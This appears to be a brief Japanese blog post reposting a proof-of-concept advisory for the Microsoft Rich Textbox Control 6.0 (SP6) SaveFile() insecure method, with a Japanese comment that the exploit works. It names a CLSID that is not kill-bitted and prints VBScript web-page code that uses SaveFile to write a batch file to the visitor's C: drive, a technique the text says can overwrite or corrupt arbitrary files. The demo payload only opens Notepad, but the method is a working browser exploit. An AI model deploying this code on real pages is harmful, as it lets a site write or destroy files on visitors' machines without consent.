Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method

Microsoft Rich Textbox Control 6.0 (SP6)経由で任意のコマンドが実行可能とのこと。

ってか、このPoCというかExploit何でも動くやん・・・

While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
works fine so it is possible, using the "SaveFile()" method,
to save the content of the rich textbox on a user's pc.
This can be used to save, overwrite and/or corrupt arbitrary
files on the system.

<script language='vbscript'>
  Sub tryMe
   test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause"
   test.SaveFile "C:\shinnai.bat", 1
   MsgBox "Exploit completed!"
 End Sub
</script>